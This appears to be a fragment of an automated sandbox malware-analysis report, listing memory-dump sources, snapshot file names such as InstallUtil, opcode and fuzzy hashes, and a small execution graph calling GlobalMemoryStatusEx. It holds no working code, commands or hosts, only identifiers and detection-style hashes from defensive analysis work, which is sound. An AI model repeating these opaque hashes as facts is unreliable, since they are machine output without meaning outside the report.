                                              • Snapshot File: hcaresult_6_2_5ff0000_Xpnzea.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: %$%$G$`$i
                                              • API String ID: 0-439984575
                                              • Opcode ID: 903a15f2bfa2938574da28380297422f2ce6fb97e097126cf098f7cdbce2af89
                                              • Instruction ID: cdbb0575c78eec4310273214cc46f37b421bfcad414292488e3ddf0ccb4e957a
                                              • Opcode Fuzzy Hash: 903a15f2bfa2938574da28380297422f2ce6fb97e097126cf098f7cdbce2af89
                                              • Instruction Fuzzy Hash: 1061B274901218CFDB60DF68C888B9DBBB2BF49315F2481D9D509A76A0DB39AEC0CF55

                                              Execution Graph

                                              Execution Coverage:11.9%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:10
                                              Total number of Limit Nodes:2
                                              execution_graph 28586 5dae128 28587 5dae132 28586->28587 28588 5dae0e3 28586->28588 28591 5dae153 28587->28591 28592 5dae1b6 GlobalMemoryStatusEx 28587->28592 28588->28587 28590 5dae0ee 28588->28590 28594 5dad248 28588->28594 28593 5dae1e6 28592->28593 28595 5dae170 GlobalMemoryStatusEx 28594->28595 28597 5dae1e6 28595->28597 28597->28588
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1708509653.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2680000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 8bd9ff83cb4930eb404a8b524bcd0d2658fbb061e13f5d1e763ee3868508a7bd
                                              • Instruction ID: baf6b4e8cf072326898f249ccfa5348ac20e2bdeb6e08bdb8888c7acba5f221a
                                              • Opcode Fuzzy Hash: 8bd9ff83cb4930eb404a8b524bcd0d2658fbb061e13f5d1e763ee3868508a7bd
                                              • Instruction Fuzzy Hash: 18326D74A012059FDB14EF68D484BADBBB2FF88310F248669E906EB395DB75DC41CB90
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1708509653.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2680000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: fcca63b9f04e76d13ed631a7a26426b075185a779595b410e2ff6a71c1971712
                                              • Instruction ID: 9628d53de94c559cd301aa6dc939ac0e773782cf128d2921d6cb3bad07f21955
                                              • Opcode Fuzzy Hash: fcca63b9f04e76d13ed631a7a26426b075185a779595b410e2ff6a71c1971712
                                              • Instruction Fuzzy Hash: DF916D34A01214DFDB18EFA8D595AADBBB2FF88310F248569E906E7364DB35DC42CB50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1708509653.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2680000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: c4a557f9e5c6bd15779932c9f5c1d7ca538061023cfa2bf9976c41b8320a6273
                                              • Instruction ID: 78a1d2f1f8269b6d9a130a98e386d72164b1ef8e54bd97196da96eab76a638c8
                                              • Opcode Fuzzy Hash: c4a557f9e5c6bd15779932c9f5c1d7ca538061023cfa2bf9976c41b8320a6273
                                              • Instruction Fuzzy Hash: 08317030E1060A9BDB19EF65D89469EB7F2FF89300F508529E806E7750DB74AC46CB90
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1708509653.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2680000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ec9d42a271d8d0070a676d90819bc5b7093dd733507624a8f4d1698b86fbfb10
                                              • Instruction ID: 33c7601d732d8b9d4860d8b3e742644e7e7b0315b96914c92ae79d28a905625a
                                              • Opcode Fuzzy Hash: ec9d42a271d8d0070a676d90819bc5b7093dd733507624a8f4d1698b86fbfb10
                                              • Instruction Fuzzy Hash: 15316E34E1060A9BDB19EFA5D89569EB7F2BF89300F508529E806E7750DF74AC41CB90
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1708509653.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2680000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4ac5b40533ae7c5ea8abd21def11ed6a44ced474ea1adc7cce0bd8cd089553e
                                              • Instruction ID: ec2c4535659a7fcb80c48935547b257e6ad3240d8d428102223d1f20fa1a74f6
                                              • Opcode Fuzzy Hash: f4ac5b40533ae7c5ea8abd21def11ed6a44ced474ea1adc7cce0bd8cd089553e
                                              • Instruction Fuzzy Hash: F5319331E006069BDB09DFA4D9907EEB7B2FF89304F10862AE405FB390EB719846CB50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1708509653.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2680000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f94e9e7bb35abfb713f7c0e9401c21d5289ccd52b1085eb6882df5a15f334170
                                              • Instruction ID: b182576b43bb4d45efecf7739fd5f01dffab70cfca8c78a09d7a69ee62af2726
                                              • Opcode Fuzzy Hash: f94e9e7bb35abfb713f7c0e9401c21d5289ccd52b1085eb6882df5a15f334170
                                              • Instruction Fuzzy Hash: 9A217430E0060A9BDF19DFA5D9906EEF7B2FF89304F148629E805EB394EB719841CB50
                                              Memory Dump Source
                                              • Source File: 00000007.00000002.1708509653.0000000002680000.00000040.00000800.00020000.00000000.sdmp, Offset: 02680000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_7_2_2680000_InstallUtil.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 322b3ed1a64d8aa1f60e458b3f088ac789915cdd9a1eb62220569a0dea321786
                                              • Instruction ID: d7b7ef95320b802070da47492eff572cf34fa0e3cf7ae591ac83a251b89b35f8
                                              • Opcode Fuzzy Hash: 322b3ed1a64d8aa1f60e458b3f088ac789915cdd9a1eb62220569a0dea321786
                                              • Instruction Fuzzy Hash: FB21AC74A003418BEF327768E49836C3766EB43319F100AEAE40AD7391DF29CC868B56